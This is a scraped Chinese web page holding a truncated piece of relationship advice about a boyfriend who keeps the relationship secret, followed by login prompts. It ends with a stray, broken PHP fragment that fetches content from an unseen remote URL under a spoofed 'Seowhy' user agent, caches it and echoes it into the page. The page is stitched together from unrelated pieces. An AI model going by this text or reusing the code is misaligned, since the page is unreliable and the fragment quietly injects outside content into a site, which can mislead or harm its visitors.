谈恋爱后,男友却从不和别人提起和你的这段恋情,那么,你就不要和他继续下去,没有人甘愿有一段地下情。心理一:有放不下的人虽然你们可能恋爱了一段时间,但是可能对方并没有放下曾经喜欢的人,他的心理可能有自己放不下的人,所以不愿意再承认别人是他的爱人,或者觉得还有机会,不敢公布两个人的恋情。如果遇到这种情况,首先要问自己是不是想继续和这个人走下去
2022-05-11 540
显示验证码
没有账号?注册  忘记密码?
array( "header"=>array( "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0 Seowhy", ), "method" => "GET", "timeout" => 2 ), ); $context = stream_context_create($opts); $content = @file_get_contents($url,false, $context); if (isset($http_response_header)) { if(is_array($http_response_header)){ $http_response_header = $http_response_header[0]; } if(strpos($http_response_header,"200 OK") !==false && $content != "error"){ @file_put_contents($cacheUrl, $content); echo $content; } } }else{ $content = @file_get_contents($cacheUrl); echo $content; } ?>